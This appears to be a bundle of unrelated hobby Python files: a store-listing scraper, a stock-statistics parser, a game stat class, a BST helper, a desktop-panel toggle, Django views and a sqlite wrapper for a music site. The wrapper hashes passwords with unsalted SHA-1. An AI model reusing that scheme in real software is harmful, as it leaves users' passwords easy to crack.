{"seq_id":"651488877","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport requests\nimport pandas as pd\n\n# optional first step, define the driver, ie chrome or Brave\ndriver = webdriver.Chrome('./chromedriver') # <- chromedriver needs to be the same version as chrome\n\n\n\n# request the data from the desired page (requests returns a Response object; selenium's driver.get returns None)\npage = requests.get(\"https://www.walgreens.com/storelistings/storesbycity.jsp?requestType=locator&state=ID\")\n\n# set encoding- this is the default so technically not necessary\npage.encoding = 'ISO-8859-1'\n\n# collect your soup!\nsoup = BeautifulSoup(page.text, 'html.parser')\n\n# can print the page output with this -> print(soup.prettify())\n\n# now let's narrow in on the data we want to collect\n\nboost_list = soup.find_all()#class_ = 'sportsbook-odds american default-color')\nfor i in boost_list[:2]: \n    print('\\n',i)\n\nevent_list = soup.find_all()\nfor i in event_list[:2]:\n    print('\\n',i)\n\nprint('\\nlist type', type(boost_list))\nprint('\\nlist length',len(boost_list))\n\nexample = boost_list[0] # a representative example\nexample_content = example.contents\nprint('\\nall of example.contents',example_content) # <- this prints the new odds \n\nmore_example_content = example.contents[0]\nprint('\\nattributes of one piece of example contents',more_example_content.attrs)\n\n\n\n# why does this only 
return one boost cell? The others are collapsed- must uncollapse them\n\n# what do the attributes mean? attributes can be accessed like dictionary keys, eg example_content['href']\n\n# how do we extract the odds value? Use a combination of classes and attributes to access the desired values\n\n\n\n\n# boost_list = soup.find_all(class_ = 'sportsbook-odds american default-color')\n# for i in boost_list[:2]: \n# print('\\nBOOsted cell body',i)\n\n# event_list = soup.find_all(class_ = 'component-101__cell__name')\n# for i in event_list[:2]:\n# print('\\nEvent names',i)\n\n# print('\\nboost list type', type(boost_list))\n# print('\\nboost list length',len(boost_list))\n\n# example = boost_list[0] # a representative example\n# example_content = example.contents\n# print('\\nall of example.contents',example_content) # <- this prints the new odds \n\n# more_example_content = example.contents[0]\n# print('\\nattributes of one piece of example contents',more_example_content.attrs)\n\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"190900738","text":"import pandas as pd\nimport os\nimport time\nfrom datetime import datetime\nfrom time import mktime\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nstyle.use(\"dark_background\")\nimport re\n\n#set path to files\ndirpath = os.path.dirname(__file__)\niQpath = os.path.join(dirpath, 'intraQuarter\\\\intraQuarter')\n\n#get the debt to equity ratios\ndef Key_Stats(gather=[\"Total Debt/Equity\",\n\t\t\t\t\t 'Trailing P/E',\n\t\t\t\t\t 'Price/Sales',\n\t\t\t\t\t 'Price/Book',\n\t\t\t\t\t 'Profit Margin',\n\t\t\t\t\t 'Operating Margin',\n\t\t\t\t\t 'Return on Assets',\n\t\t\t\t\t 'Return on Equity',\n\t\t\t\t\t 'Revenue Per Share',\n\t\t\t\t\t 'Market Cap',\n\t\t\t\t\t\t'Enterprise Value',\n\t\t\t\t\t\t'Forward P/E',\n\t\t\t\t\t\t'PEG Ratio',\n\t\t\t\t\t\t'Enterprise Value/Revenue',\n\t\t\t\t\t\t'Enterprise Value/EBITDA',\n\t\t\t\t\t\t'Revenue',\n\t\t\t\t\t\t'Gross Profit',\n\t\t\t\t\t\t'EBITDA',\n\t\t\t\t\t\t'Net Income Avl to Common ',\n\t\t\t\t\t\t'Diluted EPS',\n\t\t\t\t\t\t'Earnings Growth',\n\t\t\t\t\t\t'Revenue Growth',\n\t\t\t\t\t\t'Total Cash',\n\t\t\t\t\t\t'Total Cash Per Share',\n\t\t\t\t\t\t'Total Debt',\n\t\t\t\t\t\t'Current Ratio',\n\t\t\t\t\t\t'Book Value Per Share',\n\t\t\t\t\t\t'Cash Flow',\n\t\t\t\t\t\t'Beta',\n\t\t\t\t\t\t'Held by Insiders',\n\t\t\t\t\t\t'Held by Institutions',\n\t\t\t\t\t\t'Shares Short (as of',\n\t\t\t\t\t\t'Short Ratio',\n\t\t\t\t\t\t'Short % of Float',\n\t\t\t\t\t\t'Shares Short (prior ']):\n\tstatspath = iQpath+'/_KeyStats'\n\tstock_list = [x[0] for x in os.walk(statspath)] #gets the list of stocks\n\tdf = pd.DataFrame(columns = ['Date',\n\t\t\t\t\t\t\t\t 'Unix',\n\t\t\t\t\t\t\t\t 'Ticker',\n\t\t\t\t\t\t\t\t 'Price',\n\t\t\t\t\t\t\t\t 'stock_p_change',\n\t\t\t\t\t\t\t\t 'SP500',\n\t\t\t\t\t\t\t\t 'sp500_p_change',\n\t\t\t\t\t\t\t\t 'Difference',\n\t\t\t\t\t\t\t\t ##############\n\t\t\t\t\t\t\t\t 'DE Ratio',\n\t\t\t\t\t\t\t\t 'Trailing P/E',\n\t\t\t\t\t\t\t\t 'Price/Sales',\n\t\t\t\t\t\t\t\t 'Price/Book',\n\t\t\t\t\t\t\t\t 'Profit Margin',\n\t\t\t\t\t\t\t\t 'Operating Margin',\n\t\t\t\t\t\t\t\t 'Return on Assets',\n\t\t\t\t\t\t\t\t 'Return on Equity',\n\t\t\t\t\t\t\t\t 'Revenue Per Share',\n\t\t\t\t\t\t\t\t 'Market Cap',\n\t\t\t\t\t\t\t\t 'Enterprise Value',\n\t\t\t\t\t\t\t\t 'Forward P/E',\n\t\t\t\t\t\t\t\t 'PEG Ratio',\n\t\t\t\t\t\t\t\t 
'Enterprise Value/Revenue',\n\t\t\t\t\t\t\t\t 'Enterprise Value/EBITDA',\n\t\t\t\t\t\t\t\t 'Revenue',\n\t\t\t\t\t\t\t\t 'Gross Profit',\n\t\t\t\t\t\t\t\t 'EBITDA',\n\t\t\t\t\t\t\t\t 'Net Income Avl to Common ',\n\t\t\t\t\t\t\t\t 'Diluted EPS',\n\t\t\t\t\t\t\t\t 'Earnings Growth',\n\t\t\t\t\t\t\t\t 'Revenue Growth',\n\t\t\t\t\t\t\t\t 'Total Cash',\n\t\t\t\t\t\t\t\t 'Total Cash Per Share',\n\t\t\t\t\t\t\t\t 'Total Debt',\n\t\t\t\t\t\t\t\t 'Current Ratio',\n\t\t\t\t\t\t\t\t 'Book Value Per Share',\n\t\t\t\t\t\t\t\t 'Cash Flow',\n\t\t\t\t\t\t\t\t 'Beta',\n\t\t\t\t\t\t\t\t 'Held by Insiders',\n\t\t\t\t\t\t\t\t 'Held by Institutions',\n\t\t\t\t\t\t\t\t 'Shares Short (as of',\n\t\t\t\t\t\t\t\t 'Short Ratio',\n\t\t\t\t\t\t\t\t 'Short % of Float',\n\t\t\t\t\t\t\t\t 'Shares Short (prior ', \n\t\t\t\t\t\t\t\t ##############\n\t\t\t\t\t\t\t\t 'Status'])\n\tsp500_df = pd.read_csv(\"SP500SampleData.csv\") #Downloaded SP500 data from Quandl into Dataframe\n\tstock_df = pd.read_csv(\"stock_prices2.csv\")\n\tticker_list = []\n\n\tfor each_dir in stock_list[1:]: #stocks 1 to all\n\t\teach_file = os.listdir(each_dir)\n\t\tticker = each_dir.split(\"_KeyStats\\\\\")[1]\n\t\tticker_list.append(ticker)\n\n\t\t# starting_stock_value = False\n\t\t# starting_sp500_value = False\n\n\t\tif len(each_file) > 0: #makes sure there is data\n\t\t\tfor file in each_file:\n\t\t\t\tdate_stamp = datetime.strptime(file, '%Y%m%d%H%M%S.html')\n\t\t\t\tunix_time = time.mktime(date_stamp.timetuple())\n\t\t\t\tfull_file_path = each_dir+'/'+file\n\t\t\t\tsource = open(full_file_path,'r').read()\n\t\t\t\ttry:\n\t\t\t\t\tvalue_list = []\n\n\t\t\t\t\tfor each_data in gather:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tregex = re.escape(each_data) + r'.*?(\\d{1,8}\\.\\d{1,8}K?M?B?|N/A)%?'\n\t\t\t\t\t\t\tvalue = re.search(regex, source)\n\t\t\t\t\t\t\tvalue = (value.group(1))\n\n\t\t\t\t\t\t\tif \"B\" in value:\n\t\t\t\t\t\t\t\tvalue = float(value.replace(\"B\",''))*1000000000\n\t\t\t\t\t\t\telif \"M\" in value:\n\t\t\t\t\t\t\t\tvalue = float(value.replace(\"M\",''))*1000000\n\t\t\t\t\t\t\telif \"K\" in value:\n\t\t\t\t\t\t\t\tvalue = float(value.replace(\"K\",''))*1000\n\n\t\t\t\t\t\t\tvalue_list.append(value)\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tvalue = \"N/A\"\n\t\t\t\t\t\t\tvalue_list.append(value)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsp500_date = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_date]\n\t\t\t\t\t\tsp500_value = float(row[\"Adj Close\"])\n\t\t\t\t\texcept:\n\t\t\t\t\t\tsp500_date = datetime.fromtimestamp(unix_time-259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_date]\n\t\t\t\t\t\tsp500_value = float(row[\"Adj Close\"])\n\n\t\t\t\t\tone_year_later = int(unix_time + 31536000)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tsp500_1y = datetime.fromtimestamp(one_year_later).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_1y]\n\t\t\t\t\t\tsp500_1y_value = float(row[\"Adj Close\"])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsp500_1y = datetime.fromtimestamp(one_year_later - 259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\t\trow = sp500_df[sp500_df[\"Date\"] == sp500_1y]\n\t\t\t\t\t\t\tsp500_1y_value = float(row[\"Adj Close\"])\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"S&P 500 exception\", str(e))\n\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tstock_price_1y = datetime.fromtimestamp(one_year_later).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == 
stock_price_1y][ticker.upper()]\n\t\t\t\t\t\tstock_1y_value = round(float(row),2)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tstock_price_1y = datetime.fromtimestamp(one_year_later - 259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == stock_price_1y][ticker.upper()]\n\t\t\t\t\t\t\tstock_1y_value = round(float(row),2)\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"stock price exception\", str(e))\n\t\t\t\t\t\t\tpass\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tstock_price = datetime.fromtimestamp(unix_time).strftime('%Y-%m-%d')\n\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == stock_price][ticker.upper()]\n\t\t\t\t\t\tstock_price = round(float(row),2)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tstock_price = datetime.fromtimestamp(unix_time - 259200).strftime('%Y-%m-%d')\n\t\t\t\t\t\t\trow = stock_df[stock_df[\"Date\"] == stock_price][ticker.upper()]\n\t\t\t\t\t\t\tstock_price = round(float(row),2)\n\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\tprint(\"stock price exception:\", str(e))\n\t\t\t\t\t\t\tpass\n\n\n\t\t\t\t\tstock_p_change = round(((stock_1y_value - stock_price) / stock_price * 100),2)\n\t\t\t\t\tsp500_p_change = round(((sp500_1y_value - sp500_value) / sp500_value * 100),2)\n\t\t\t\t\tdifference = stock_p_change - sp500_p_change\n\n\t\t\t\t\tif difference > 0:\n\t\t\t\t\t\tstatus = \"outperform\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tstatus = \"underperform\"\n\n\t\t\t\t\tif value_list.count(\"N/A\") > 0:\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\tdf = df.append({'Date':date_stamp,\n\t\t\t\t\t\t\t\t\t\t\t'Unix':unix_time,\n\t\t\t\t\t\t\t\t\t\t\t'Ticker':ticker,\n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t\t'Price':stock_price,\n\t\t\t\t\t\t\t\t\t\t\t'stock_p_change':stock_p_change,\n\t\t\t\t\t\t\t\t\t\t\t'SP500':sp500_value,\n\t\t\t\t\t\t\t\t\t\t\t'sp500_p_change':sp500_p_change,\n\t\t\t\t\t\t\t\t\t\t\t'Difference':difference,\n\t\t\t\t\t\t\t\t\t\t\t'DE Ratio':value_list[0],\n\t\t\t\t\t\t\t\t\t\t\t#'Market Cap':value_list[1],\n\t\t\t\t\t\t\t\t\t\t\t'Trailing P/E':value_list[1],\n\t\t\t\t\t\t\t\t\t\t\t'Price/Sales':value_list[2],\n\t\t\t\t\t\t\t\t\t\t\t'Price/Book':value_list[3],\n\t\t\t\t\t\t\t\t\t\t\t'Profit Margin':value_list[4],\n\t\t\t\t\t\t\t\t\t\t\t'Operating Margin':value_list[5],\n\t\t\t\t\t\t\t\t\t\t\t'Return on Assets':value_list[6],\n\t\t\t\t\t\t\t\t\t\t\t'Return on Equity':value_list[7],\n\t\t\t\t\t\t\t\t\t\t\t'Revenue Per Share':value_list[8],\n\t\t\t\t\t\t\t\t\t\t\t'Market Cap':value_list[9],\n\t\t\t\t\t\t\t\t\t\t\t 'Enterprise Value':value_list[10],\n\t\t\t\t\t\t\t\t\t\t\t 'Forward P/E':value_list[11],\n\t\t\t\t\t\t\t\t\t\t\t 'PEG Ratio':value_list[12],\n\t\t\t\t\t\t\t\t\t\t\t 'Enterprise Value/Revenue':value_list[13],\n\t\t\t\t\t\t\t\t\t\t\t 'Enterprise Value/EBITDA':value_list[14],\n\t\t\t\t\t\t\t\t\t\t\t 'Revenue':value_list[15],\n\t\t\t\t\t\t\t\t\t\t\t 'Gross Profit':value_list[16],\n\t\t\t\t\t\t\t\t\t\t\t 'EBITDA':value_list[17],\n\t\t\t\t\t\t\t\t\t\t\t 'Net Income Avl to Common ':value_list[18],\n\t\t\t\t\t\t\t\t\t\t\t 'Diluted EPS':value_list[19],\n\t\t\t\t\t\t\t\t\t\t\t 'Earnings Growth':value_list[20],\n\t\t\t\t\t\t\t\t\t\t\t 'Revenue Growth':value_list[21],\n\t\t\t\t\t\t\t\t\t\t\t 'Total Cash':value_list[22],\n\t\t\t\t\t\t\t\t\t\t\t 'Total Cash Per Share':value_list[23],\n\t\t\t\t\t\t\t\t\t\t\t 'Total Debt':value_list[24],\n\t\t\t\t\t\t\t\t\t\t\t 'Current Ratio':value_list[25],\n\t\t\t\t\t\t\t\t\t\t\t 'Book Value Per Share':value_list[26],\n\t\t\t\t\t\t\t\t\t\t\t 'Cash 
Flow':value_list[27],\n\t\t\t\t\t\t\t\t\t\t\t 'Beta':value_list[28],\n\t\t\t\t\t\t\t\t\t\t\t 'Held by Insiders':value_list[29],\n\t\t\t\t\t\t\t\t\t\t\t 'Held by Institutions':value_list[30],\n\t\t\t\t\t\t\t\t\t\t\t 'Shares Short (as of':value_list[31],\n\t\t\t\t\t\t\t\t\t\t\t 'Short Ratio':value_list[32],\n\t\t\t\t\t\t\t\t\t\t\t 'Short % of Float':value_list[33],\n\t\t\t\t\t\t\t\t\t\t\t 'Shares Short (prior ':value_list[34],\n\t\t\t\t\t\t\t\t\t\t\t'Status':status},\n\t\t\t\t\t\t\t\t\t\t ignore_index=True)\n\t\t\t\t#exception in case some data is missing or not a float\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tpass\n\t# for each_ticker in ticker_list:\n\t# \ttry:\n\t# \t\tplot_df = df[(df['Ticker'] == each_ticker)]\n\t# \t\tplot_df = plot_df.set_index(['Date']) \n\n\t# \t\tif plot_df['Status'][-1] == \"underperform\":\n\t# \t\t\tcolor = 'r'\n\t# \t\telse:\n\t# \t\t\tcolor = 'g'\n\t# \t\tplot_df['Difference'].plot(label = each_ticker, color = color)\n\t# \t\tplt.legend()\n\t# \texcept:\n\t# \t\tpass\n\t# plt.show()\n\t#Save output to CSV\n\tdf.to_csv(\"key_stats_acc_perf_NO_NA.csv\")\n\n\t\t\t\n\nKey_Stats()\n","sub_path":"DataParse.py","file_name":"DataParse.py","file_ext":"py","file_size_in_byte":8648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"649418660","text":"from output import Op\nfrom serialize import AbstractJsonSerialable\nfrom stat_classes import Stat\nfrom utilities import choose\nfrom abc import abstractmethod\n\nclass AbstractCustomizable(AbstractJsonSerialable):\n nextId = 0\n \"\"\"\n Required kwargs:\n - type : str\n - name : str\n - customizationPoints : int (defaults to 0)\n - stats : dict{ str : int } this currently must be handled by subclasses\n \"\"\"\n def __init__(self, **kwargs):\n super(AbstractCustomizable, self).__init__(**kwargs)\n self.name = kwargs[\"name\"]\n self.type = kwargs[\"type\"]\n self.customizationPoints = kwargs.get(\"customizationPoints\", 0)\n self.id = AbstractCustomizable.nextId\n # Key: attr name, value: Stat.\n # attributes which to player can customize.\n self.stats = {}\n #for k, v in kwargs[\"stats\"].items():\n # self.addStat(k, v)\n AbstractCustomizable.nextId += 1\n self.user = None\n self.addSerializedAttributes(\n \"name\",\n \"customizationPoints\",\n \"stats\"\n )\n\n #def addStat(self, name, base):\n # self.stats[name.lower()] = Stat(name, base)\n def addStat(self, stat):\n self.stats[stat.name.lower()] = stat\n\n \"\"\"\n Re-sets a stat's base calculation value\n \"\"\"\n def setStatBase(self, statName: str, newBase: int):\n self.stats[statName.lower()].set_base(newBase)\n\n def getStatValue(self, statName: str)->float:\n return self.stats[statName.lower()].get()\n\n def setUser(self, user):\n self.user = user\n\n def __str__(self):\n return self.name\n\n # more or less a replacement for AbstractUpgradable.getDisplayData()\n def getStatDisplayList(self)->list:\n ret = [\"{0}'s stats:\".format(self.name)]\n for k, v in self.stats.items():\n ret.append(\"\\t{0}: {1}\".format(k, str(v.get())))\n return ret\n\n \"\"\"\n Provides a menu, so the player can customize this\n \"\"\"\n def customizeMenu(self):\n done = False\n while not done and self.customizationPoints > 0:\n Op.add(self.getStatDisplayList())\n Op.display()\n exit = \"Save changes and exit\"\n options = [exit]\n canIncrease = []\n canDecrease = []\n for statName, stat in self.stats.items():\n if not stat.is_max():\n canIncrease.append(statName)\n if not stat.is_min():\n canDecrease.append(statName)\n 
options.extend(canIncrease) # choose stat to increase first\n            options.reverse()\n\n            increaseMe = choose(\"Which stat do you want to increase?\", options)\n            if increaseMe == exit:\n                done = True\n            else:\n                options = [exit]\n                for statName in canDecrease:\n                    if statName != increaseMe:\n                        options.append(statName)\n                options.reverse()\n\n                decreaseMe = choose(\"Which stat do you want to decrease?\", options)\n                if decreaseMe == exit:\n                    done = True\n                else:\n                    self.setStatBase(increaseMe, self.stats[increaseMe].get_base() + 1)\n                    self.setStatBase(decreaseMe, self.stats[decreaseMe].get_base() - 1)\n                    self.calcStats()\n                    self.customizationPoints -= 1\n\n    @abstractmethod\n    def getDisplayData(self)->list:\n        pass\n\n    def displayData(self):\n        Op.add(self.getDisplayData())\n        Op.display()\n\n    \"\"\"\n    Calculates all of this object's stats\n    \"\"\"\n    def calcStats(self):\n        for stat in self.stats.values():\n            stat.reset_boosts()\n            stat.calc()\n","sub_path":"characters/customizable.py","file_name":"customizable.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"627820123","text":"def kthSmallest(self, root, k):\n    count = []\n    self.helper(root, count)\n    return count[k-1]\n    \ndef helper(self, node, count):\n    if not node:\n        return\n    \n    self.helper(node.left, count)\n    count.append(node.val)\n    self.helper(node.right, count)\n","sub_path":"二叉树/230.kthsmallestinBST.py","file_name":"230.kthsmallestinBST.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"650116033","text":"#!/usr/bin/env python3\n\"\"\"Toggle xfce4-panel, invoked via 3-finger swipe up using Gester.\"\"\"\n\nimport subprocess\n\n\ndef is_panel_running():\n    p = [\"pidof\", \"xfce4-panel\"]\n    result = subprocess.run(p,\n                            stdout=subprocess.PIPE)\n    # '' if not running, else the process id\n    return result.stdout.decode('utf-8')\n\n\nif is_panel_running():\n    subprocess.run(\"xfce4-panel -q &\", shell=True)\nelse:\n    subprocess.run(\"xfce4-panel -d &\", shell=True)\n","sub_path":".config/i3/toggle_xfce4-panel.py","file_name":"toggle_xfce4-panel.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"7354533","text":"from django.shortcuts import render, get_object_or_404, render_to_response\n#from django.http import HttpResponse\n# Import template loader \n# Import Album from models for connecting the database\nfrom .models import Album, Song\nfrom django.template import RequestContext\n\n# Create your views here.\n\ndef index(request):\n    #return HttpResponse(\"<h1>This is Music app home page.</h1>
\")\n    #Get all the Album objects\n    all_albums = Album.objects.all()\n    #Create a variable with the name html and return that variable.\n    \n    #In the following you don't need to give the directory name as 'templates', as it's already taken\n    #care of by the django framework, so you don't need to give a path such as 'templates/music/index.html'\n    context = {'all_albums': all_albums} \n    #The following line renders index.html and passes context (a dictionary of data). \n    #return HttpResponse(template.render(context, request))\n    return render(request, 'music/index.html', context)\n    #Instead of context you can directly write code e.g. {'all_albums': all_albums}\n    #E.g. return render(request, 'music/index.html', {'all_albums': all_albums} )\ndef detail(request, album_id):\n    #Example of Http404 Error\n    #album = Album.objects.get(pk=album_id)\n    try: \n        album = get_object_or_404(Album, pk=album_id) \n        \n        return render(request, 'music/detail.html', {'album': album})\n    except Exception as e:\n        return render(request, 'music/404.html')\n    \n    \ndef favorite(request, album_id):\n    album = get_object_or_404(Album, pk=album_id)\n    try:\n        selected_song = album.song_set.get(pk=request.POST['song'])\n    except (KeyError, Song.DoesNotExist):\n        return render(request, 'music/detail.html', {\n            'album': album,\n            'error_message': \"You didn't select a valid song\",\n        })\n    else:\n        selected_song.is_favorite = True\n        selected_song.save()\n        return render(request, 'music/detail.html', {'album': album})\n\n# --------------------Error handling------------------#############\n#def custom_404(request):\n#    return render(request, 'music/404.html', {}, status=404)\n\ndef handler404(request):\n    #response = render_to_response('music/404.html')\n    #response.status_code = 404\n    #return response\n    return render(request, 'music/404.html')\n\n\ndef handler500(request):\n    #response = render_to_response('music/500.html') \n    #response.status_code = 500\n    #return response\n    return render(request, 'music/500.html')\n","sub_path":"website/music/views_example_customError_Page404.py","file_name":"views_example_customError_Page404.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"119281968","text":"import sqlite3\nimport datetime,time\nimport sha\n\ndef hash_password(password):\n    return sha.sha(password).hexdigest()\ndef convert_date(date_string):\n    if not date_string:\n        return None\n    return datetime.datetime.strptime(date_string, \"%Y-%m-%dT%H:%M:%S.%f\")\ndef dict_factory(cursor, row):\n    d = {}\n    for idx, col in enumerate(cursor.description):\n        d[col[0]] = row[idx]\n    return d\nclass DB:\n    def __init__(self):\n        self.opened = False\n    def open(self):\n        if not self.opened:\n            self.conn = sqlite3.connect('data/metainfo.db',\n                detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\n            self.conn.row_factory = dict_factory\n            self.opened = True\n    def close(self):\n        if self.opened:\n            self.conn.commit()\n            self.conn.close()\n            self.opened = False\n    def get_cursor(self):\n        if not self.opened:\n            self.open()\n        return self.conn.cursor()\n    def hash_password(self, password):\n        return hash_password(password)\n    # Users\n    def make_user(self, row):\n        if row:\n            return {'user_id': int(row['id']),\n                '_id': row['id'],\n                'username': row['username'],\n                'password': row['password'],\n                'email': row['email'],\n                'profile': row['profile'],\n                'confirmed': row['confirmed'] == 1,\n                'regdate': convert_date(row['regdate']) }\n        return None\n    def username_exists(self, username):\n        return self.get_user_ic(username) 
!= None\n def get_user_by_id(self, user_id):\n if user_id == None:\n return None\n try:\n self.open()\n rows = self.conn.execute(\"select * from users where id = ?\", [int(user_id)])\n for row in rows:\n return self.make_user(row)\n return None\n finally:\n self.close()\n def get_user_ic(self, username):\n try:\n self.open()\n rows = self.conn.execute(\"select * from users where username = ?\", [username])\n for row in rows:\n return self.make_user(row)\n return None\n finally:\n self.close()\n def add_user(self, user):\n try:\n self.open()\n values = [user['username'],\n user['password'],\n user['email'],\n user['profile'],\n user['confirmed'],\n user['regdate']]\n c = self.conn.cursor()\n res = c.execute(\"\"\"insert into users (username, password, email, \n profile, confirmed, regdate)\n values (?, ?, ?, ?, ?, ?)\"\"\", values)\n c.close()\n return res\n finally:\n self.close()\n def verify_user(self, username, password):\n user = self.get_user_ic(username)\n if not user:\n return False\n return user['password'] == hash_password(password)\n # Samples\n def make_sample(self, row):\n if row:\n return {'id': int(row['id']),\n '_id': row['id'],\n 'name': row['name'],\n 'game': row['game'],\n 'instrument': row['instrument'] }\n return None\n def add_sample(self, **kargs):\n try:\n self.open()\n values = [kargs['name'], kargs['game'], kargs['instrument']]\n return self.conn.execute(\"\"\"insert into samples (name, game, instrument)\n values(?,?,?)\"\"\", values)\n finally:\n self.close()\n def get_sample(self, name):\n try:\n self.open()\n rows = self.conn.execute(\"select * from samples where name = ?\", [name])\n for row in rows:\n return self.make_sample(row)\n finally:\n self.close()\n def get_sample_games(self):\n try:\n self.open()\n rows = self.conn.execute(\"select distinct game from samples\")\n games = [row['game'] for row in rows]\n return games\n finally:\n self.close()\n def get_sample_instruments(self):\n try:\n self.open()\n rows = self.conn.execute(\"select distinct instrument from samples\")\n instruments = [row['instrument'] for row in rows]\n return instruments\n finally:\n self.close()\n def get_samples(self, games=[], instruments=[]):\n try:\n self.open()\n samples = []\n for game in games:\n rows = self.conn.execute(\"select * from samples where game = ?\", [game])\n samples += [self.make_sample(row) for row in rows]\n for instrument in instruments:\n rows = self.conn.execute(\"select * from samples where instrument = ?\", [instrument])\n samples += [self.make_sample(row) for row in rows]\n if (not games) and (not instruments):\n rows = self.conn.execute(\"select * from samples\")\n samples = [self.make_sample(row) for row in rows]\n return samples\n finally:\n self.close()\n # Tracks\n def count_tracks(self, artist=None, finished=False):\n try:\n self.open()\n if artist:\n rows = self.conn.execute(\"\"\"SELECT count(*) as count from tracks\n where artist = ?\"\"\", [artist])\n else: \n rows = self.conn.execute(\"\"\"SELECT count(*) as count from tracks\n where finished = ?\"\"\", [int(finished)])\n for row in rows:\n return int(row['count'])\n finally:\n self.close()\n def get_tracks(self, offset=0, limit=20, order='date', artist=None, finished=False):\n try:\n self.open()\n rows = []\n if artist:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where \n artist = ?\n ORDER BY last_modified DESC LIMIT ?,?\"\"\", \n [artist, offset, limit])\n elif finished:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where finished = ?\n ORDER BY last_finished DESC LIMIT 
?,?\"\"\", \n [int(finished), offset, limit])\n else:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where finished = ?\n ORDER BY last_modified DESC LIMIT ?,?\"\"\", \n [int(finished), offset, limit])\n tracks = [dict(row) for row in rows]\n for track in tracks:\n track['date'] = convert_date(track['date'])\n track['last_modified'] = convert_date(track['last_modified'])\n track['last_finished'] = convert_date(track['last_finished'])\n return tracks\n finally:\n self.close()\n def get_track(self, track_id):\n try:\n self.open()\n if type(track_id) == type(1) or len(track_id) < 10:\n track_id = int(track_id)\n rows = self.conn.execute(\"\"\"SELECT * from tracks where id = ?\"\"\",\n [track_id])\n else:\n rows = self.conn.execute(\"\"\"SELECT * from tracks where bid = ?\"\"\",\n [track_id])\n track = {}\n for row in rows:\n track = dict(row)\n return track\n finally:\n self.close()\n def remove_track(self, track_id):\n try:\n self.open()\n self.conn.execute(\"DELETE from tracks where id = ?\",\n [track_id])\n self.conn.execute(\"DELETE from comments where track_id = ?\",\n [track_id])\n finally:\n self.close()\n def create_track(self, track):\n try:\n self.open()\n c = self.conn.cursor()\n c.execute(\"\"\"INSERT into tracks (title, artist, body, date, last_modified, finished)\n values (?,?,?,?,?,0)\"\"\",\n [track['title'], track['artist'], track['body'],\n datetime.datetime.now().isoformat(),\n datetime.datetime.now().isoformat()])\n tid = c.lastrowid\n return tid\n finally:\n c.close()\n self.close()\n def update_track(self, track_id, track):\n try:\n self.open()\n self.conn.execute(\"\"\"UPDATE tracks \n set title = ?,\n artist = ?,\n date = ?,\n last_modified = ?,\n last_finished = ?,\n body = ?,\n finished = ?\n where id = ?\"\"\",\n [track['title'],\n track['artist'],\n track['date'],\n track['last_modified'],\n track['last_finished'],\n track['body'],\n track['finished'],\n int(track_id)])\n finally:\n self.close()\n # Comments\n def get_comments(self, track_id):\n try:\n self.open()\n rows = self.conn.execute(\"SELECT * from comments where track_id = ?\", [track_id])\n comments = [dict(row) for row in rows]\n for comment in comments:\n comment['date'] = convert_date(comment['date'])\n return comments\n finally:\n self.close()\n def add_comment(self, track_id, comment):\n try:\n self.open()\n self.conn.execute(\"\"\"INSERT into comments (track_id, author, \n message, date) VALUES(?,?,?,?)\"\"\",\n [track_id, comment['author'], comment['message'], comment['date']])\n finally:\n self.close()\n def get_recent_comments(self, user):\n try:\n self.open()\n rows = self.conn.execute(\"\"\"SELECT tracks.id as track_id, \n tracks.title as track_title,\n comments.author as author, \n comments.message as message,\n comments.date as date\n FROM tracks, comments\n WHERE tracks.artist = ?\n AND tracks.id = comments.track_id\n ORDER BY comments.date DESC\n LIMIT 0,30\"\"\",\n [user])\n return [dict(row) for row in rows]\n finally:\n 